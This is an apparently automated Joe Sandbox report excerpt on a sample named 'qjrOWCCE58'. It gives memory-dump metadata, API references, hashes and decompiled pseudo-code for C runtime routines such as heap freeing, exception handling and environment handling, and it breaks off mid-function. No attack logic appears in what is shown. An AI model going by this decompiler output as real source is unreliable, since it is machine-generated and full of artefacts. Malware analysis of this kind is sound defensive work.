CallUnexpected.LIBVCRUNTIME ref: 00830F08

Strings

csm, xrefs: 00830BA6
csm, xrefs: 00830CBF
csm, xrefs: 00830C13

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: e9be4eaa81843e2760fefa6845e5e00ce76653fd21b0999f00d899327e9ecae3
Instruction ID: af754936277b54f463db0ba7ad5c8070443faca15983fcb08f3f16f3a0f3cb37
Opcode Fuzzy Hash: e9be4eaa81843e2760fefa6845e5e00ce76653fd21b0999f00d899327e9ecae3
Instruction Fuzzy Hash: 17B15A71900219EFCF29DFA8C8A19AEBBB5FF84310F144559E815AB212D731EA51CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 0041B21B Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041B21B(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x42f3f0;
				if(_t68 != 0x42f3f0) {
					E0041CA88(_t68);
					_t36 = _a4;
				}
				E0041CA88( *((intOrPtr*)(_t36 + 0x3c)));
				E0041CA88( *((intOrPtr*)(_a4 + 0x30)));
				E0041CA88( *((intOrPtr*)(_a4 + 0x34)));
				E0041CA88( *((intOrPtr*)(_a4 + 0x38)));
				E0041CA88( *((intOrPtr*)(_a4 + 0x28)));
				E0041CA88( *((intOrPtr*)(_a4 + 0x2c)));
				E0041CA88( *((intOrPtr*)(_a4 + 0x40)));
				E0041CA88( *((intOrPtr*)(_a4 + 0x44)));
				E0041CA88( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E0041B047(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0041B0B2(_t67, _t72, _t73, _t77);
			}

0x0041b21b
0x0041b21b
0x0041b21b
0x0041b220
0x0041b226
0x0041b228
0x0041b22e
0x0041b231
0x0041b236
0x0041b239
0x0041b23d
0x0041b248
0x0041b253
0x0041b25e
0x0041b269
0x0041b274
0x0041b27f
0x0041b28a
0x0041b298
0x0041b2a3
0x0041b2ab
0x0041b2ac
0x0041b2af
0x0041b2b5
0x0041b2b9
0x0041b2bd
0x0041b2be
0x0041b2c8
0x0041b2ce
0x0041b2cf
0x0041b2d2
0x0041b2d8
0x0041b2dc
0x0041b2e0
0x0041b2e7

APIs

_free.LIBCMT ref: 0041B231

Part of subcall function 0041CA88: HeapFree.KERNEL32(00000000,00000000,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?), ref: 0041CA9E
Part of subcall function 0041CA88: GetLastError.KERNEL32(?,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?,?), ref: 0041CAB0

_free.LIBCMT ref: 0041B23D
_free.LIBCMT ref: 0041B248
_free.LIBCMT ref: 0041B253
_free.LIBCMT ref: 0041B25E
_free.LIBCMT ref: 0041B269
_free.LIBCMT ref: 0041B274
_free.LIBCMT ref: 0041B27F
_free.LIBCMT ref: 0041B28A
_free.LIBCMT ref: 0041B298

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 81e85c931828a32c511b8ca79cd029497d71f613fddea684c010edb9c4e9da3b
Instruction ID: 269ef3aae0acf1f4adc3a89a9e868028377bd1aa0b3ef041a4229ca5aefe8220
Opcode Fuzzy Hash: 81e85c931828a32c511b8ca79cd029497d71f613fddea684c010edb9c4e9da3b
Instruction Fuzzy Hash: E921B67694010CAFCB02EFA5D881DDE7BB8FF08345F4081AAF515AB121DB35EA85CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0083B482 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0083B498

Part of subcall function 0083CCEF: HeapFree.KERNEL32(00000000,00000000,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?), ref: 0083CD05
Part of subcall function 0083CCEF: GetLastError.KERNEL32(?,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?,?), ref: 0083CD17

_free.LIBCMT ref: 0083B4A4
_free.LIBCMT ref: 0083B4AF
_free.LIBCMT ref: 0083B4BA
_free.LIBCMT ref: 0083B4C5
_free.LIBCMT ref: 0083B4D0
_free.LIBCMT ref: 0083B4DB
_free.LIBCMT ref: 0083B4E6
_free.LIBCMT ref: 0083B4F1
_free.LIBCMT ref: 0083B4FF

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 81e85c931828a32c511b8ca79cd029497d71f613fddea684c010edb9c4e9da3b
Instruction ID: ed23f774bf12df5a8848a8064c2646f7c7bd94279e2baa9f53bc35945da131e1
Opcode Fuzzy Hash: 81e85c931828a32c511b8ca79cd029497d71f613fddea684c010edb9c4e9da3b
Instruction Fuzzy Hash: 40219876900108AFCB41EFA8C881DDE7BB9FF49341F015166B619EB121EB31DA45DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00429581 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042A26F), ref: 0042959A

Strings

log, xrefs: 004295F7, 00429606
exp, xrefs: 00429619, 0042967E
sqrt, xrefs: 004296D9
acos, xrefs: 004296D0
asin, xrefs: 004296C7
pow, xrefs: 00429638, 004296E2, 0042972F
log10, xrefs: 004295DC, 004295EB

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 10bbd5971cec7894065c51a639a1529e3a12bd48247020281c29b738a6cec6bb
Instruction ID: 88c0647c94e689bee695c5f6c6eb625a9917fc57f7c53441112a39912c93d067
Opcode Fuzzy Hash: 10bbd5971cec7894065c51a639a1529e3a12bd48247020281c29b738a6cec6bb
Instruction Fuzzy Hash: 2A518B75A0012ACBCF108FA9F84C5AEBBB4FF49300F954197D481A6264CB7C8D66CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0042431F Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0042431F(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E0041CA2B(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E0041D4FF(4);
						_t120 = 0;
						_v8 = _t125;
						E0041CA88(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x43b160; // 0x43b1b4
								 *_t93 = _t53;
								_t54 =  *0x43b164; // 0x43c784
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x43b168; // 0x43c784
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x43b190; // 0x43b1b8
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x43b194; // 0x43c788
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E0041D4FF(4);
							_v12 = _t121;
							E0041CA88(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t69 = E0041FE95(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E0041FE95(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t74 = E0041FE95(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
								_t77 = E0041FE95(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E0041FE95(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E004242B6(_t93);
								E0041CA88(_t93);
								E0041CA88(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E0041CA88(_v8);
								return _v16;
							}
							E0041CA88();
							goto L12;
						}
						E0041CA88(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x43b160;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E0041CA88( *((intOrPtr*)(_t123 + 0x7c)));
							E0041CA88( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x0042431f
0x00424329
0x0042432f
0x00424332
0x0042433b
0x0042435a
0x00424362
0x00424368
0x0042437b
0x0042437c
0x00424385
0x00424387
0x0042438a
0x0042438d
0x00424396
0x004243a7
0x004243a9
0x004243b2
0x00424501
0x00424506
0x00424508
0x0042450d
0x00424510
0x00424515
0x00424518
0x0042451d
0x00424520
0x00424525
0x00424494
0x0042449a
0x0042449e
0x004244a0
0x004244a0
0x00000000
0x0042449e
0x004243bf
0x004243c3
0x004243c6
0x004243cd
0x004243d0
0x004243dd
0x004243e3
0x004243ef
0x004243f4
0x00424403
0x0042440a
0x00424417
0x0042442b
0x00424435
0x0042444c
0x00424478
0x00424488
0x00424488
0x0042448c
0x00000000
0x00000000
0x0042447d
0x0042447d
0x00424483
0x004244ef
0x00424487
0x00424487
0x00000000
0x00424487
0x004244f1
0x004244f3
0x004244f3
0x004244f6
0x004244f8
0x004244fb
0x00000000
0x004244ff
0x00424485
0x00000000
0x00424485
0x0042448e
0x00424491
0x00000000
0x00424491
0x0042444f
0x00424455
0x0042445d
0x00424465
0x00424469
0x0042446d
0x00000000
0x00424475
0x004243d2
0x00000000
0x004243d7
0x00424399
0x00000000
0x004243a1
0x00000000
0x00424345
0x00424345
0x00424347
0x0042434a
0x004244a2
0x004244a2
0x004244aa
0x004244ac
0x004244ac
0x004244b4
0x004244b9
0x004244bd
0x004244c2
0x004244cd
0x004244d3
0x004244bd
0x004244d7
0x004244dc
0x004244e2
0x00000000
0x004244e2

APIs

_free.LIBCMT ref: 0042438D
_free.LIBCMT ref: 00424399
_free.LIBCMT ref: 004244C2
_free.LIBCMT ref: 004244CD

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7c795b1c52ff7f9e6d42c69c5820a5112f07e130b985bc9f557ac03747206cec
Instruction ID: 7898da1dcb0b1432afad9644fc9f87cff75e83039ff86306b0bfdafcb1316aad
Opcode Fuzzy Hash: 7c795b1c52ff7f9e6d42c69c5820a5112f07e130b985bc9f557ac03747206cec
Instruction Fuzzy Hash: 0261F371A403159FDB20EF75E881BABB7E8EF84350F50412BE945EB281EB74AD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00844586 Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008445F4
_free.LIBCMT ref: 00844600
_free.LIBCMT ref: 00844729
_free.LIBCMT ref: 00844734

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7c795b1c52ff7f9e6d42c69c5820a5112f07e130b985bc9f557ac03747206cec
Instruction ID: 2d899507f0faedb32be39538f337da86d2699c2c7e8a6f695224291ec36a722b
Opcode Fuzzy Hash: 7c795b1c52ff7f9e6d42c69c5820a5112f07e130b985bc9f557ac03747206cec
Instruction Fuzzy Hash: 8861F57190030D9FEB20DF78C841BAAB7E9FF46750F215469E955EB281EB70AD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0082B0F7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0082B140
std::_Lockit::_Lockit.LIBCPMT ref: 0082B162
std::_Lockit::~_Lockit.LIBCPMT ref: 0082B182
__Getctype.LIBCPMT ref: 0082B218
std::_Facet_Register.LIBCPMT ref: 0082B237
std::_Lockit::~_Lockit.LIBCPMT ref: 0082B24F

Strings

yC, xrefs: 0082B1F9

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: yC
API String ID: 1102183713-4112074249
Opcode ID: 3ebba0ebb1d3b28b82617adecb99c91f3f850ce10ea8435dedbad83465121f65
Instruction ID: 633b5259ad7a3fcee1c3ea26d09d108d75153c2130660a29b4c189b3a559cd13
Opcode Fuzzy Hash: 3ebba0ebb1d3b28b82617adecb99c91f3f850ce10ea8435dedbad83465121f65
Instruction Fuzzy Hash: 3541B1B1D01268CFDB14DF58E891BAEB7B4FF14714F14416AE806E7251DB30AD85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 004103D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004103D0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E0042A9BE(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x43b054;
				E00410390(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x43b054);
				E0041142C(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E00411750(_t80, 0xfffffffe, _t103, 0x43b054);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E004116F0(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E00410390(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x42d198;
											if(__eflags != 0) {
												_t75 = E0042A3C0(__eflags, "��@");
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x42d198; // 0x40e7e3
													 *0x42c218(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E00411730(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E00411750(_t68, _t100, _t103, 0x43b054);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E00410390(_t80, _t95, _t100, _t103, _v12);
										E00411710();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t49 = _t71 + 1; // 0x57f
													_t98 =  *_t49;
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x004103d0
0x004103d7
0x004103db
0x004103dc
0x004103e2
0x004103ee
0x004103f0
0x004103f6
0x004103f6
0x004103ff
0x00410401
0x00410404
0x00410407
0x0041040f
0x00410414
0x00410417
0x0041041a
0x00410421
0x0041047d
0x00410480
0x00410488
0x0041048f
0x00000000
0x0041048f
0x00000000
0x00410423
0x00410423
0x00410429
0x0041042f
0x00410435
0x004104a0
0x004104a9
0x00410437
0x00410437
0x00410437
0x0041043d
0x00410440
0x00410443
0x00410446
0x00410449
0x0041044e
0x00410464
0x00000000
0x00410450
0x00410450
0x00410452
0x00410457
0x00410459
0x0041045c
0x0041045e
0x00410474
0x00410494
0x00410494
0x00410498
0x00000000
0x00410460
0x00410460
0x004104aa
0x004104ad
0x004104b3
0x004104b5
0x004104bc
0x004104c3
0x004104c8
0x004104cb
0x004104cd
0x004104cf
0x004104dc
0x004104e2
0x004104e4
0x004104e7
0x004104e7
0x004104ea
0x004104ea
0x004104bc
0x004104f0
0x004104f2
0x004104f7
0x004104fa
0x004104fd
0x00410505
0x00410509
0x0041050e
0x0041050e
0x00410511
0x00410515
0x00410518
0x00410528
0x0041052d
0x00410531
0x00410534
0x00410537
0x00410539
0x0041053f
0x00410542
0x00410542
0x00410545
0x00410545
0x00410547
0x00410549
0x00000000
0x00000000
0x0041054b
0x0041054d
0x00000000
0x0041054f
0x0041054f
0x0041054f
0x00410552
0x00410555
0x00000000
0x00410557
0x00410557
0x0041055a
0x0041055d
0x0041055f
0x00000000
0x00410561
0x00000000
0x00410561
0x0041055f
0x00410555
0x00000000
0x0041054d
0x00410563
0x00410565
0x00410565
0x00410569
0x0041053b
0x0041053b
0x0041053b
0x0041053e
0x0041053e
0x00410462
0x00000000
0x00410462
0x00410460
0x0041045e
0x00000000
0x00410467
0x00410467
0x00410469
0x00410470
0x00000000
0x00410472
0x00000000
0x00410470
0x00410435
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00410407
___except_validate_context_record.LIBVCRUNTIME ref: 0041040F
_ValidateLocalCookies.LIBCMT ref: 00410498
__IsNonwritableInCurrentImage.LIBCMT ref: 004104C3
_ValidateLocalCookies.LIBCMT ref: 00410518

Strings

csm, xrefs: 004104AD
@, xrefs: 004104B5, 004104BE, 004104CF

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$@
API String ID: 1170836740-241803511
Opcode ID: b948bcbac638f1370441953e1e5c1243e38c2fc6996c81172dd2bada455f1ac1
Instruction ID: 6141036abf9932b94335c3f31f4add1a2f3969d422433cca37d7e20d5c3c10c5
Opcode Fuzzy Hash: b948bcbac638f1370441953e1e5c1243e38c2fc6996c81172dd2bada455f1ac1
Instruction Fuzzy Hash: 0D41E734A00208DFCF10DF69C880ADEBBB5AF45328F14805BEA195B392D77999D5CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004233E4 Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004233E4(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E00411460(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E00411DE1(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x43c898 - _t110; // 0x58fc90
							if(__eflags != 0) {
								L14:
								_t64 =  *0x43c898; // 0x58fc90
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E004236EC(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E0042374C(_t120, _t139, 4);
													E0041CA88(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E0041CA88( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E0042374C(_t139, _t138, 4);
												E0041CA88(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x43c898 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E0041CA2B(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E0041CA88(_t149);
													goto L40;
												} else {
													_t76 = E0041AF78(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E00411D34();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E0041CA2B(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00418419(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E0041CA88(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
